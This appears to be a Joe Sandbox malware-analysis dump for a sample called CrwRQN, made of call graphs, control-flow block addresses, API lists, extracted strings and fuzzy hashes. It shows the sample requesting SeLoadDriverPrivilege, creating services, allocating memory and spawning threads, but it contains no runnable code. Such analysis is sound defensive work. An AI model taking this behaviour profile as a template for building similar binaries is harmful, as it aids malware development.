140005250 14192->14195 14194 140005389 14194->14107 14196 140005271 14195->14196 14197 1400073e0 _lock LdrLoadDll 14196->14197 14198 14000527e 14197->14198 14199 1400073e0 _lock LdrLoadDll 14198->14199 14200 14000528d 14199->14200 14206 1400052f0 _lock 14200->14206 14207 140008490 14200->14207 14202 1400052b5 14203 1400052d9 14202->14203 14202->14206 14210 140008400 14202->14210 14205 140008400 7 API calls 14203->14205 14203->14206 14205->14206 14206->14194 14208 1400084c5 HeapSize 14207->14208 14209 140008499 sprintf_s 14207->14209 14209->14202 14212 140008430 14210->14212 14213 140008472 14212->14213 14214 140008450 Sleep 14212->14214 14215 14000e920 14212->14215 14213->14203 14214->14212 14214->14213 14216 14000e935 14215->14216 14217 14000e94c 14216->14217 14227 14000e95e 14216->14227 14218 140008de0 _lock 2 API calls 14217->14218 14221 14000e951 14218->14221 14219 14000e9b1 14220 1400090b0 _lock LdrLoadDll 14219->14220 14223 14000e9b9 _lock sprintf_s 14220->14223 14221->14212 14222 14000e973 HeapReAlloc 14222->14223 14222->14227 14223->14212 14224 14000e9f4 sprintf_s 14226 14000e9f9 GetLastError 14224->14226 14225 1400090b0 _lock LdrLoadDll 14225->14227 14226->14223 14227->14219 14227->14222 14227->14224 14227->14225 14228 14000e9db sprintf_s 14227->14228 14229 14000e9e0 GetLastError 14228->14229 14229->14223 14231 140001482 CreateServiceW 14230->14231 14232 14000147a GetLastError 14230->14232 14234 1400014ea GetLastError 14231->14234 14235 1400014df CloseServiceHandle 14231->14235 14233 1400014fd 14232->14233 14245 140004f30 14233->14245 14237 1400014f2 CloseServiceHandle 14234->14237 14235->14237 14237->14233 14238 14000150d 14238->13997 14240 1400011fa 14239->14240 14254 1400051d0 14240->14254 14243 140004f30 sprintf_s NtAllocateVirtualMemory 14244 140001262 14243->14244 14244->13997 14247 140004f39 _SetImageBase 14245->14247 14246 140004f44 14246->14238 14247->14246 14250 140006c95 14247->14250 14249 14000660e sprintf_s 14249->14238 14252 140006d7b 14250->14252 14253 140006d9d 14250->14253 14251 140006f95 NtAllocateVirtualMemory 14251->14253 14252->14251 14252->14253 14253->14249 14257 140008270 14254->14257 14256 140001238 MessageBoxW 14256->14243 14258 14000827e 14257->14258 14260 1400082ac sprintf_s 14257->14260 14258->14260 14261 140008120 14258->14261 14260->14256 14262 14000816a 14261->14262 14266 14000813b sprintf_s 14261->14266 14264 1400081d7 14262->14264 14262->14266 14267 140007f50 14262->14267 14265 140007f50 sprintf_s 54 API calls 14264->14265 14264->14266 14265->14266 14266->14260 14276 140007f69 sprintf_s 14267->14276 14268 140007f74 sprintf_s 14268->14264 14269 14000801d 14270 1400080d5 14269->14270 14271 14000802f 14269->14271 14272 14000cc00 sprintf_s 54 API calls 14270->14272 14273 14000804c 14271->14273 14275 140008081 14271->14275 14277 140008056 14272->14277 14283 14000cc00 14273->14283 14275->14277 14291 14000c2a0 14275->14291 14276->14268 14276->14269 14280 14000cd50 14276->14280 14277->14264 14281 140008300 _lock 17 API calls 14280->14281 14282 14000cd6a 14281->14282 14282->14269 14284 14000cc3f 14283->14284 14290 14000cc23 sprintf_s 14283->14290 14284->14290 14299 14000fc50 14284->14299 14288 14000ccc5 sprintf_s 14344 14000fd20 LeaveCriticalSection 14288->14344 14290->14277 14292 14000c2e0 14291->14292 14295 14000c2c3 sprintf_s 14291->14295 14293 14000fc50 sprintf_s 25 API calls 14292->14293 14292->14295 14294 14000c34e 14293->14294 14296 14000c1f0 sprintf_s 2 API calls 14294->14296 14297 14000c367 sprintf_s 14294->14297 14295->14277 14296->14297 14378 14000fd20 LeaveCriticalSection 14297->14378 14300 14000fc96 14299->14300 14301 14000fccb 14299->14301 14345 14000b400 14300->14345 14302 14000ccac 14301->14302 14303 14000fccf EnterCriticalSection 14301->14303 14302->14288 14309 14000c3f0 14302->14309 14303->14302 14311 14000c42e 14309->14311 14328 14000c427 sprintf_s 14309->14328 14310 140004f30 sprintf_s NtAllocateVirtualMemory 14312 14000cbe6 14310->14312 14315 14000c4fb _SetImageBase sprintf_s 14311->14315 14311->14328 14372 14000c1f0 14311->14372 14312->14288 14314 14000c841 14316 14000c86a 14314->14316 14317 14000cb20 WriteFile 14314->14317 14315->14314 14318 14000c526 GetConsoleMode 14315->14318 14320 14000c936 14316->14320 14324 14000c876 14316->14324 14319 14000cb53 GetLastError 14317->14319 14317->14328 14318->14314 14321 14000c557 14318->14321 14319->14328 14326 14000c940 14320->14326 14334 14000ca02 14320->14334 14321->14314 14322 14000c564 GetConsoleCP 14321->14322 14322->14328 14338 14000c581 sprintf_s 14322->14338 14323 14000c8c5 WriteFile 14323->14324 14325 14000c928 GetLastError 14323->14325 14324->14323 14324->14328 14325->14328 14326->14328 14329 14000c991 WriteFile 14326->14329 14327 14000ca57 WideCharToMultiByte 14330 14000cb15 GetLastError 14327->14330 14327->14334 14328->14310 14329->14326 14331 14000c9f4 GetLastError 14329->14331 14330->14328 14331->14328 14332 14000cab0 WriteFile 14333 14000caf6 GetLastError 14332->14333 14332->14334 14333->14328 14333->14334 14334->14327 14334->14328 14334->14332 14335 14000c649 WideCharToMultiByte 14335->14328 14336 14000c68c WriteFile 14335->14336 14336->14338 14339 14000c80d GetLastError 14336->14339 14337 14000c829 GetLastError 14337->14328 14338->14328 14338->14335 14338->14337 14340 14000fd50 7 API calls sprintf_s 14338->14340 14341 14000c6e2 WriteFile 14338->14341 14343 14000c81b GetLastError 14338->14343 14339->14328 14340->14338 14341->14338 14342 14000c7ff GetLastError 14341->14342 14342->14328 14343->14328 14346 14000b41e 14345->14346 14347 14000b42f EnterCriticalSection 14345->14347 14351 14000b2f0 14346->14351 14349 14000b423 14349->14347 14350 1400084e0 _lock 12 API calls 14349->14350 14350->14347 14352 14000b317 14351->14352 14354 14000b32e 14351->14354 14353 140009540 _lock 12 API calls 14352->14353 14355 14000b31c 14353->14355 14356 140008300 _lock 17 API calls 14354->14356 14360 14000b342 sprintf_s 14354->14360 14357 140009300 _lock 10 API calls 14355->14357 14358 14000b350 14356->14358 14359 14000b324 14357->14359 14358->14360 14361 14000b400 _lock 22 API calls 14358->14361 14362 140008510 _lock GetModuleHandleA GetProcAddress ExitProcess 14359->14362 14360->14349 14363 14000b371 14361->14363 14362->14354 14364 14000b3a7 14363->14364 14365 14000b379 14363->14365 14367 140008de0 _lock HeapFree GetLastError 14364->14367 14366 14000edc0 _lock LdrLoadDll GetModuleHandleA GetProcAddress 14365->14366 14368 14000b386 14366->14368 14371 14000b392 sprintf_s 14367->14371 14370 140008de0 _lock HeapFree GetLastError 14368->14370 14368->14371 14369 14000b3b0 LeaveCriticalSection 14369->14360 14370->14371 14371->14369 14373 14000c20c sprintf_s 14372->14373 14374 14000c212 sprintf_s 14373->14374 14375 14000c22c SetFilePointer 14373->14375 14374->14315 14376 14000c24a GetLastError 14375->14376 14377 14000c254 sprintf_s 14375->14377 14376->14377 14377->14315 13944 140006c95 13946 140006d7b 13944->13946 13947 140006d9d 13944->13947 13945 140006f95 NtAllocateVirtualMemory 13945->13947 13946->13945 13946->13947 14379 1400054e0 14380 14000552c 14379->14380 14383 140005506 sprintf_s 14379->14383 14392 1400074d0 14380->14392 14384 140008370 3 API calls 14388 140005545 _SetImageBase 14384->14388 14385 1400055b8 14386 140008de0 _lock 2 API calls 14385->14386 14387 1400055c0 sprintf_s 14386->14387 14387->14383 14388->14385 14396 1400074f0 14388->14396 14391 1400055b0 GetLastError 14391->14385 14394 140007333 14392->14394 14393 140005536 14393->14384 14394->14393 14395 1400073e0 LdrLoadDll 14394->14395 14395->14394 14398 140007333 14396->14398 14397 140005561 CreateThread 14397->14387 14397->14391 14398->14397 14399 1400073e0 LdrLoadDll 14398->14399 14399->14398

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 131 140006c95-140006d75 132 1400075a3-1400075af 131->132 133 140006d7b-140006d9b 131->133 134 140006da2-140006dbc 133->134 135 140006d9d 133->135 136 140006dc3-140006ded 134->136 137 140006dbe 134->137 135->132 138 140006df4-140006e04 136->138 139 140006def 136->139 137->132 140 140006e06 138->140 141 140006e0b-140006e19 138->141 139->132 140->132 142 140006e1b 141->142 143 140006e20-140006e2f 141->143 142->132 144 140006e31 143->144 145 140006e36-140006e4e 143->145 144->132 146 140006e5a-140006e67 145->146 147 140006e69-140006e94 146->147 148 140006e9d-140006ed0 146->148 149 140006e96 147->149 150 140006e9b 147->150 151 140006edc-140006ee9 148->151 149->132 150->146 153 140006f89-140006f8e 151->153 154 140006eef-140006f23 151->154 155 140006f95-140006fd6 NtAllocateVirtualMemory 153->155 156 140006f90 153->156 157 140006f25-140006f2d 154->157 158 140006f2f-140006f33 154->158 155->132 159 140006fdc-140007020 155->159 156->132 160 140006f37-140006f7a 157->160 158->160 161 14000702c-140007037 159->161 162 140006f84 160->162 163 140006f7c-140006f80 160->163 164 140007039-140007058 161->164 165 14000705a-140007062 161->165 162->151 163->162 164->161 168 14000706e-14000707b 165->168 169 140007081-140007094 168->169 170 140007148-14000715e 168->170 173 140007096-1400070a9 169->173 174 1400070ab 169->174 171 1400072e2-1400072eb 170->171 172 140007164-14000717a 170->172 172->171 173->174 175 1400070ad-1400070db 173->175 176 140007064-14000706a 174->176 177 1400070ea-140007101 175->177 176->168 178 140007143 177->178 179 140007103-140007141 177->179 178->176 179->177
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: @$@
                                    • API String ID: 0-149943524
                                    • Opcode ID: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
                                    • Instruction ID: b9b90cad4d4dbad5e60228b5b2812afcd9ff4e9267d7912497f5da913a33a31e
                                    • Opcode Fuzzy Hash: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
                                    • Instruction Fuzzy Hash: 0EE19876619B84CADBA1CB19E4807AAB7A1F3C8795F105116FB8E87B68DB7CC454CF00

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 256 1400073e0-1400073e9 LdrLoadDll 257 1400073f8-140007401 256->257 258 140007403 257->258 259 140007408-14000742e 257->259 260 1400075a3-1400075af 258->260 262 140007435-140007462 259->262 263 140007430 259->263 265 140007464-14000747e 262->265 266 1400074b6-1400074e9 262->266 264 140007559-140007567 263->264 274 140007341-1400073de 264->274 275 14000756c-1400075a2 264->275 268 1400074b4 265->268 269 140007480-1400074b3 265->269 270 1400074eb-14000752b 266->270 271 14000752c-140007535 266->271 268->271 269->268 270->271 272 140007552 271->272 273 140007537-140007554 271->273 272->260 273->264 274->256 275->260
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: Load
                                    • String ID:
                                    • API String ID: 2234796835-0
                                    • Opcode ID: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
                                    • Instruction ID: 9a2124daaedac402c784edcfb7064d0c1467828d98a6eaf5875e1b487be58861
                                    • Opcode Fuzzy Hash: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
                                    • Instruction Fuzzy Hash: 2451A676619BC582DA71CB1AE4907EEA360F7C8B85F504026EB8E87B69DF3DC455CB00

                                    Control-flow Graph

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: File$CreateReadmalloc
                                    • String ID: .$.$L$M$M$a$a$c$c$d$d$i$l$l$l$l$m$m$o$p$r$s$s$s$t$t$t$v
                                    • API String ID: 3950102678-3381721293
                                    • Opcode ID: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
                                    • Instruction ID: 29f707ba186f29322d2427d6251999ac740dd2877dad0e4ee3b4d54c0b8fffc7
                                    • Opcode Fuzzy Hash: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
                                    • Instruction Fuzzy Hash: 0241A03250C7C0C9E372C729E45879BBB91E3A6748F04405997C846B9ACBBED158CB22

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 25 7ffe1a4c1c00-7ffe1a4c1c06 26 7ffe1a4c1c08-7ffe1a4c1c0b 25->26 27 7ffe1a4c1c41-7ffe1a4c1c4b 25->27 29 7ffe1a4c1c0d-7ffe1a4c1c10 26->29 30 7ffe1a4c1c35-7ffe1a4c1c74 call 7ffe1a4c2470 26->30 28 7ffe1a4c1d68-7ffe1a4c1d7d 27->28 34 7ffe1a4c1d8c-7ffe1a4c1da6 call 7ffe1a4c2304 28->34 35 7ffe1a4c1d7f 28->35 32 7ffe1a4c1c28 __scrt_dllmain_crt_thread_attach 29->32 33 7ffe1a4c1c12-7ffe1a4c1c15 29->33 45 7ffe1a4c1c7a-7ffe1a4c1c8f call 7ffe1a4c2304 30->45 46 7ffe1a4c1d42 30->46 41 7ffe1a4c1c2d-7ffe1a4c1c34 32->41 37 7ffe1a4c1c17-7ffe1a4c1c20 33->37 38 7ffe1a4c1c21-7ffe1a4c1c26 call 7ffe1a4c23b4 33->38 48 7ffe1a4c1da8-7ffe1a4c1dd9 call 7ffe1a4c242c call 7ffe1a4c22d4 call 7ffe1a4c27b4 call 7ffe1a4c25d0 call 7ffe1a4c25f4 call 7ffe1a4c245c 34->48 49 7ffe1a4c1ddb-7ffe1a4c1e0c call 7ffe1a4c2630 34->49 39 7ffe1a4c1d81-7ffe1a4c1d8b 35->39 38->41 58 7ffe1a4c1d5a-7ffe1a4c1d67 call 7ffe1a4c2630 45->58 59 7ffe1a4c1c95-7ffe1a4c1ca6 call 7ffe1a4c2374 45->59 50 7ffe1a4c1d44-7ffe1a4c1d59 46->50 48->39 60 7ffe1a4c1e1d-7ffe1a4c1e23 49->60 61 7ffe1a4c1e0e-7ffe1a4c1e14 49->61 58->28 77 7ffe1a4c1ca8-7ffe1a4c1ccc call 7ffe1a4c2778 call 7ffe1a4c22c4 call 7ffe1a4c22e8 call 7ffe1a4c7b10 59->77 78 7ffe1a4c1cf7-7ffe1a4c1d01 call 7ffe1a4c25d0 59->78 62 7ffe1a4c1e65-7ffe1a4c1e6d call 7ffe1a4c1720 60->62 63 7ffe1a4c1e25-7ffe1a4c1e2f 60->63 61->60 67 7ffe1a4c1e16-7ffe1a4c1e18 61->67 79 7ffe1a4c1e72-7ffe1a4c1e7b 62->79 69 7ffe1a4c1e36-7ffe1a4c1e3c 63->69 70 7ffe1a4c1e31-7ffe1a4c1e34 63->70 68 7ffe1a4c1f02-7ffe1a4c1f0f 67->68 75 7ffe1a4c1e3e-7ffe1a4c1e44 69->75 70->75 82 7ffe1a4c1ef8-7ffe1a4c1f00 75->82 83 7ffe1a4c1e4a-7ffe1a4c1e5f call 7ffe1a4c1c00 75->83 77->78 127 7ffe1a4c1cce-7ffe1a4c1cd5 __scrt_dllmain_after_initialize_c 77->127 78->46 99 7ffe1a4c1d03-7ffe1a4c1d0f call 7ffe1a4c2620 78->99 86 7ffe1a4c1e7d-7ffe1a4c1e7f 79->86 87 7ffe1a4c1eb3-7ffe1a4c1eb5 79->87 82->68 83->62 83->82 86->87 95 7ffe1a4c1e81-7ffe1a4c1ea3 call 7ffe1a4c1720 call 7ffe1a4c1d68 86->95 90 7ffe1a4c1eb7-7ffe1a4c1eba 87->90 91 7ffe1a4c1ebc-7ffe1a4c1ed1 call 7ffe1a4c1c00 87->91 90->82 90->91 91->82 109 7ffe1a4c1ed3-7ffe1a4c1edd 91->109 95->87 120 7ffe1a4c1ea5-7ffe1a4c1eaa 95->120 117 7ffe1a4c1d11-7ffe1a4c1d1b call 7ffe1a4c2538 99->117 118 7ffe1a4c1d35-7ffe1a4c1d40 99->118 115 7ffe1a4c1edf-7ffe1a4c1ee2 109->115 116 7ffe1a4c1ee4-7ffe1a4c1ef2 109->116 121 7ffe1a4c1ef4 115->121 116->121 117->118 126 7ffe1a4c1d1d-7ffe1a4c1d2b 117->126 118->50 120->87 121->82 126->118 127->78 128 7ffe1a4c1cd7-7ffe1a4c1cf4 call 7ffe1a4c7acc 127->128 128->78
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727823859.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                    • Associated: 00000005.00000002.2727798107.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727917117.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727935928.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727952107.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ffe1a4c0000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                    • String ID:
                                    • API String ID: 190073905-0
                                    • Opcode ID: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
                                    • Instruction ID: c11427a434413400df06f7cdca90558535d01ad2ce6b14406aa64165282b611b
                                    • Opcode Fuzzy Hash: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
                                    • Instruction Fuzzy Hash: 4881A021F08F4386FB54AB6B94412792290AF55FA0F9440F7EA4D877BADE7CE4758700

                                    Control-flow Graph

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727823859.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                    • Associated: 00000005.00000002.2727798107.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727917117.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727935928.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727952107.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ffe1a4c0000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: Concurrency::cancel_current_taskFree$ConsoleFileFindFirstLibrary
                                    • String ID: WordpadFilter.db
                                    • API String ID: 868324331-3647581008
                                    • Opcode ID: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
                                    • Instruction ID: 7314588c29a8c0528819b79a0fe5b1c2e11593ad4fc28775d3d306be9d11dd8e
                                    • Opcode Fuzzy Hash: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
                                    • Instruction Fuzzy Hash: BC316B32B15F4189E700CBA2D8402BD73B5EB98B98F5485B6EE8C13B59EF38D161C740

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 196 7ffe1a4c11b0-7ffe1a4c1207 197 7ffe1a4c1209-7ffe1a4c1222 call 7ffe1a4d1490 196->197 198 7ffe1a4c124b-7ffe1a4c124e 196->198 207 7ffe1a4c123e 197->207 208 7ffe1a4c1224-7ffe1a4c1227 197->208 200 7ffe1a4c14b8-7ffe1a4c14bf 198->200 201 7ffe1a4c1254-7ffe1a4c1280 198->201 205 7ffe1a4c14c3-7ffe1a4c14ea call 7ffe1a4c1b70 200->205 203 7ffe1a4c12f6-7ffe1a4c1335 call 7ffe1a4c1b90 call 7ffe1a4d0a50 201->203 204 7ffe1a4c1282-7ffe1a4c128f 201->204 233 7ffe1a4c1340-7ffe1a4c13cb 203->233 210 7ffe1a4c14f1-7ffe1a4c14f6 call 7ffe1a4c1a40 204->210 211 7ffe1a4c1295-7ffe1a4c129c 204->211 214 7ffe1a4c1241-7ffe1a4c1246 207->214 213 7ffe1a4c1229-7ffe1a4c123c call 7ffe1a4d1490 208->213 208->214 223 7ffe1a4c14f7-7ffe1a4c14ff call 7ffe1a4c1110 210->223 217 7ffe1a4c12c7-7ffe1a4c12cf call 7ffe1a4c1b90 211->217 218 7ffe1a4c129e-7ffe1a4c12a5 211->218 213->207 213->208 214->198 231 7ffe1a4c12d2-7ffe1a4c12f1 call 7ffe1a4d0e10 217->231 218->223 224 7ffe1a4c12ab-7ffe1a4c12b3 call 7ffe1a4c1b90 218->224 234 7ffe1a4c12b9-7ffe1a4c12c5 224->234 235 7ffe1a4c14eb-7ffe1a4c14f0 call 7ffe1a4c79cc 224->235 231->203 233->233 237 7ffe1a4c13d1-7ffe1a4c13da 233->237 234->231 235->210 240 7ffe1a4c13e0-7ffe1a4c1402 237->240 241 7ffe1a4c1411-7ffe1a4c142c 240->241 242 7ffe1a4c1404-7ffe1a4c140e 240->242 241->240 244 7ffe1a4c142e-7ffe1a4c1436 241->244 242->241 245 7ffe1a4c1498-7ffe1a4c14a6 244->245 246 7ffe1a4c1438-7ffe1a4c143b 244->246 248 7ffe1a4c14a8-7ffe1a4c14b5 call 7ffe1a4c1bcc 245->248 249 7ffe1a4c14b6 245->249 247 7ffe1a4c1440-7ffe1a4c1449 246->247 250 7ffe1a4c144b-7ffe1a4c1453 247->250 251 7ffe1a4c1455-7ffe1a4c1465 247->251 248->249 249->205 250->251 253 7ffe1a4c1467-7ffe1a4c146e 251->253 254 7ffe1a4c1470-7ffe1a4c1496 251->254 253->254 254->245 254->247
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727823859.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                    • Associated: 00000005.00000002.2727798107.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727917117.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727935928.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727952107.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ffe1a4c0000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                    • String ID:
                                    • API String ID: 73155330-0
                                    • Opcode ID: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
                                    • Instruction ID: 19df4b84370db2817a60840da5fb6b64f87d5c1891b27b80e32b4c5216d2fd89
                                    • Opcode Fuzzy Hash: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
                                    • Instruction Fuzzy Hash: 2A815D22B19F9245E7118B3A9800179A694FF56FE4F548376EF5D637A6EF3CE0A18300
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$Heap$AllocProcesslstrlen
                                    • String ID:
                                    • API String ID: 3526400053-0
                                    • Opcode ID: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
                                    • Instruction ID: dcb8fc7c666fd7128fde866f0540a8def7dae1288ec2bbf322971b46f3f62141
                                    • Opcode Fuzzy Hash: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
                                    • Instruction Fuzzy Hash: E3220F76211B4086E722DF26F840B9933A1F78CBE5F541226EB5A8B7B4DF3AC585C740
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: CriticalSectionServer$CreateErrorLastProcessTimerTokenWaitable$AdjustCloseContextCurrentDontEnterEventHandleInitializeLeaveListenLookupOpenPrivilegePrivilegesProtseqRegisterSerializeValueVersion
                                    • String ID: SeLoadDriverPrivilege$ampStartSingletone: logging started, settins=%s$null
                                    • API String ID: 3408796845-4213300970
                                    • Opcode ID: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
                                    • Instruction ID: 59d58333609de1a5812b0fd1fbb73637b4596d8d749a2627428b03e5fdfefd81
                                    • Opcode Fuzzy Hash: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
                                    • Instruction Fuzzy Hash: B19104B1224A4182EB12CF22F854BC633A5F78C7D4F445229FB9A4B6B4DF7AC159CB44
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: CriticalSection$CloseHandle$DeleteEnterLeaveServer$CancelEventListeningMgmtObjectSingleStopTerminateThreadTimerUnregisterWaitWaitable
                                    • String ID: ampStopSingletone: logging ended
                                    • API String ID: 2048888615-3533855269
                                    • Opcode ID: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
                                    • Instruction ID: 72436faa0f880f3f140bbf81e9e476d17cd4b789f208762ad84a5967a0be411a
                                    • Opcode Fuzzy Hash: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
                                    • Instruction Fuzzy Hash: 85315178221A0192EB17DF27EC94BD82361E79CBE1F455111FB0A4B2B1CF7AC5898744
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
